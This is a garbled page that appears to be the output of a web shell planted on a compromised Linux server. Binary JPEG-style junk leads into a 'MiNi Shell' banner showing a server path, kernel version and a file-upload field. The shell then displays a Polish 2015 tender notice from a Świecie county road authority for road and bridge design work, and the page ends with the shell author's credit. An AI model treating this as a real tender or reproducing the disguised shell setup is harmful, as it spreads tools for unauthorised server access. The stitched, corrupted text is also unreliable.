JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150918/245016-N-2015.html

<p class="kh_header"><b>Świecie: Wykonanie dokumentacji projektowej na zadanie pn.
Włączenie północno-zachodniej części Powiatu Świeckiego do
planowanego węzła w Zbrachlinie przy drodze ekspresowej S5
wchodzącej w skład korytarza TEN-T</b><br>
<b>Numer ogłoszenia: 245016 - 2015; data zamieszczenia: 18.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Gen. Józefa Hallera 9, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 56 83 224, faks 52 56 83 229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.swiecki.lo.pl/?cid=207</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej na zadanie pn.
Włączenie północno-zachodniej części Powiatu Świeckiego do
planowanego węzła w Zbrachlinie przy drodze ekspresowej S5
wchodzącej w skład korytarza TEN-T.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na włączenie
północno-zachodniej części Powiatu Świeckiego do planowanego węzła w Zbrachlinie
przy drodze ekspresowej S5 wchodzącej w skład korytarza TEN-T.
Inwestycja obejmuje swoim
4.2 Elementy składowe opracowania:
4.2.1 Wykonanie studium techniczno-ekonomiczno-środowiskowego rozwiązania
skrzyżowania projektowanej trasy z istniejącą siecią dróg.
Analiza ma na celu wstępne określenie zakresu rzeczowego
i finansowego przedsięwzięcia oraz ustalenie wariantów korytarza terenowego dla
przebiegu trasy.
4.2.2 Projekt budowlany wraz z uzyskaniem decyzji o pozwoleniu na budowę lub/i
decyzjI ZRID
4.2.3 Projekt wykonawczy wraz z projektami branżowymi
4.2.4 Projekt stałej organizacji ruchu
4.2.5 Projekt zieleni
4.2.6 Dokumentacja przetargowa
4.2.7 Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych
dla wszystkich branż
4.2.8 Informacje dotyczące bezpieczeństwa i ochrony zdrowia
4.2.9 Kosztorys inwestorski
4.2.10 Przedmiary robót budowlanych
4.2.11 Studium wykonalności inwestycji
4.3 Dokumentację projektową należy wykonać:
4.3.1 w formie papierowej:
a) projekt budowlany - w 5 egzemplarzach;
b) projekt wykonawczy - w 10 egzemplarzach;
c) informacje dotyczące bezpieczeństwa i ochrony zdrowia, specyfikacje techniczne
wykonania i odbioru robót budowlanych, przedmiar robót, projekt zieleni i kosztorys
inwestorski - w 2 egzemplarzach;
4.3.2 w wersji elektronicznej: w formacie plików pdf, - wszystkie elementy
dokumentacji wymagane do przetargu na wybudowanie przedmiotu powyższego
zamówienia
4.3.3 w wersji elektronicznej: w postaci plików edytowalnych - wszystkie elementy
dokumentacji projektowej,
4.4. Zakres przedmiotu zamówienia obejmuje ponadto:
4.4.1 Przygotowanie dokumentów i załatwienie w imieniu Zamawiającego formalności
w zakresie uzyskania warunków technicznych przyłączenia do sieci
elektroenergetycznej, kanalizacji deszczowej, wymaganych uzgodnień, opinii i decyzji
administracyjnych;
4.4.2 Uzyskanie pozwolenia wodno - prawnego, wykonanie dokumentacji geologiczno
- inżynierskiej i uzyskanie wszelkich decyzji niezbędnych do uzyskania pozwolenia na
budowę lub/i ZRID.
4.4.3 Uzyskanie decyzji o środowiskowych uwarunkowaniach.
4.4.4 Przygotowanie informacji w zakresie charakterystyki i rozwiązań technicznych;
4.4.5 Wystąpienie z wnioskiem o pozwolenie na budowę;
4.5 Dokumentacja musi spełniać wszystkie wymogi obowiązujących przepisów,
w szczególności:
a) Ustawy z dnia 7 lipca 1994r. Prawo Budowlane (tj. Dz.U. z 2013r., poz.1409 z późn.
zm.);
b) Ustawy z dnia 21 marca 1985r. o drogach publicznych (tj. Dz.U. z 2013r., poz.260 z
późn. zm.);
c) Ustawy z dnia 18 lipca 2001r. Prawo Wodne (tj. Dz.U. z 2012 r., poz.145 z późn.
zm.)
d) Ustawy z dnia 27 kwietnia 2001r. Prawo Ochrony Środowiska (tj. Dz.U. z 2013r.,
poz.1232 z późn. zm.);
e) Rozporządzenie Ministra Infrastruktury z dnia 25 kwietnia 2012r. w sprawie
szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012r., poz.462 z późn.
zm.);
f) Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. w
sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich
usytuowanie (Dz.U. z 1999r. Nr 43, poz.430 z późn. zm.);
g) Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000r.
w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty
inżynierskie i ich usytuowanie ( Dz.U. z 2000r. Nr 63, poz.735 z późn. zm.);
h) Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie
informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i
ochrony zdrowia (Dz.U. z 2003r. Nr 120, poz.1126);
i) Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz.U. z 2013r.,
poz. 907 z późn. zm.);
j) Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia
metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych
kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych
w programie funkcjonalno-użytkowym (Dz.U. Z 2004r Nr 130, poz.1389).
k) Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie
szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i
odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz.U. z 2013r.,
poz.1129).
4.6 Charakterystyka obiektu:
Droga nr 1211C Tleń - Lniano od km 0+837 do km 3+699 wraz z przebudową mostu w
m. Wierzchy - gmina Osie (JNI: 01001478,dł. obiektu 5,90 m, materiał konstrukcji
dźwigarów: beton zbrojony)
Droga nr 1211C Tleń - Lniano od km 3+699 do km 11+229 - gmina Lniano
Droga nr 1240C Błądzim - Łowin od km 0+000 do km 2+487 - gmina Lniano.
Droga nr 1240C Błądzim - Łowin od km 2+487 do km 9+412 oraz od km 10+174 do
km 11+437, wraz z budową ronda w m. Szewno - gmina Świekatowo.
Droga nr 1240C Błądzim - Łowin od km 11+437 do km 14+299 - gmina Pruszcz.
Droga nr 1266C Droga 56 - Serock - Łowin - Zbrachlin od km 13+988 do km 22+448
- gmina Pruszcz.
Założenia: Inwestycja przewiduje wyrównanie i wzmocnienie nawierzchni bitumicznej
na długości 32,389 km przebiegającej przez cztery gminy, zaprojektowanie poszerzenia
istniejących odcinków dróg do wartości przewidzianych dla klasy technicznej Z,
dodatkowo przewiduje się przebudowę obiektu mostowego w m. Wierzchy oraz
budowę skrzyżowań typu rondo w m. Szewno, Łowin i Pruszcz.
Przebieg dróg przewidzianych do przebudowy w ramach inwestycji przedstawiono na
załączniku nr 8 do SIWZ - Plan orientacyjny
Projekt należy wykonać zgodnie z koncepcją zaakceptowaną przez
Zamawiającego.
Wykonawca w okresie trwania umowy ma obowiązek co najmniej raz w miesiącu
Spotykać się z Zamawiającym w celu określenia bieżącego postępu prac
projektowych.
Wykonawca w okresie trwania umowy winien zapewnić możliwość stałego
kontaktu z osobą sprawującą nadzór nad realizacją i koordynacją wykonania
przedmiotu zamówienia z ramienia Zamawiającego- drogą elektroniczną lub/i fax.
Zamawiający zastrzega sobie prawo do zgłaszania swoich uwag, które należy
uwzględnić w dalszych pracach nad projektem.
Projekt budowlany wymaga akceptacji Zamawiającego przed złożeniem wniosku
o pozwolenie na budowę lub/ i zezwolenia na realizację inwestycji drogowej.
UWAGA!!!
Wykonawca opisze w Dokumentacji technologię robót oraz materiały budowlane,
urządzenia i inne wyroby w sposób zapewniający zachowanie uczciwej
konkurencji oraz równe traktowanie uczestników postępowania przetargowego na
wykonanie robót wg przedmiotowej Dokumentacji. W szczególności Wykonawca
w trakcie sporządzania dokumentacji projektowej oraz W specyfikacjach
technicznych wykonania i odbioru robót budowlanych zobowiązany jest
uwzględnić przepisy ustawy Prawo zamówień publicznych, w tym jej art. 29-30.
Wykonawca poniesie pełną odpowiedzialność za negatywne konsekwencje, które
Zamawiający ewentualnie poniesie z powodu niezastosowania się przez
Wykonawcę do tego obowiązku..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 złotych
(słownie: dziesięć tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia, Wykonawcy
powinni udokumentować należyte zrealizowanie usługi lub/i usług (opracowanie
dokumentacji projektowej). Za usługę/i Zamawiający uzna opracowaniu dokumentacji
projektowej/ych obejmującej/ych projekt budowlany i wykonawczy dotyczący
przebudowy i/lub budowy drogi publicznej oraz obiektu mostowego. Wykonawca musi
przedstawić dowody na wykonanie dokumentacji dot. przebudowy lub/i budowy dróg o
łącznej długości min. 10 km oraz obiekt mostowy o rozpiętości min. 10 m wykonane
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy - to w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności faktury za wykonane usługi - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla Stron postanowienia określa projekt umowy stanowiący załącznik do
niniejszej Specyfikacji.
Zgodnie z tym Zamawiający na podstawie art. 144 ust 1 ustawy Pzp przewidział
następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w
treści zawartej umowy w formie aneksu:
1) zmiana terminów wykonania dokumentacji lub części umowy z powodu:
a) przestojów i opóźnień zawinionych przez zamawiającego
b) przestojów i opóźnień zawinionych przez wykonawcę
c) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mające
bezpośredni wpływ na terminowość wykonania usług
d) przerw w realizacji usług, powstałych z przyczyn niezależnych od Wykonawcy.
e) uzgodnień pomiędzy Stronami dotyczącymi skróceniu terminu.
2) zmiana zakresu prac projektowych, pierwotnie przyjętych założeń
architektonicznych w przypadku zaistnienia okoliczności, których nie można było
przewidzieć w chwili zawarcia umowy lub wynikających z potrzeby dostosowania
założeń projektowych w możliwie najlepszy, najbardziej funkcjonalny sposób do
charakteru, przeznaczenia projektowanego obiektu.
3) zmiana nazwy, siedziby stron umowy, numerów kont bankowych oraz innych
danych identyfikacyjnych.
4) zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy
5) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze,
istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji
umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej
zawarcia;
6) w razie wystąpienia istotnych zmian okoliczności powodujących, że wykonanie
umowy nie leży w interesie Zamawiającego, czego nie można było przewidzieć w
chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie miesiąca
od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku
Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania
części umowy. Wykonawcy nie przysługuje z tego tytułu odszkodowanie, jak też
żądanie zapłaty kar umownych.
7) zmiana wysokości kwot ujętych w poszczególnych latach budżetowych realizacji
zamówienia z uwagi na przesunięcia finansowe i korekty budżetu Zamawiającego, jak
również w przypadku szybszego wyczerpania środków lub jego opóźnienia z wyjątkiem
maksymalnej kwoty zobowiązania umownego.
9) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
10) wystąpienie okoliczności, których Zamawiający nie był w stanie przewidzieć,
pomimo zachowania należytej staranności.
Jeżeli z inicjatywą zmian wychodzi Wykonawca, powyższe zmiany dopuszczone będą
wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez
Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat.swiecki.lo.pl/?app=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg 86-100 Świecie ul. Gen. Józefa Hallera 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2015 godzina 10:00, miejsce: Powiatowy Zarząd Dróg 86-100 Świecie ul. Gen. Józefa Hallera 9, Pokój 415.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com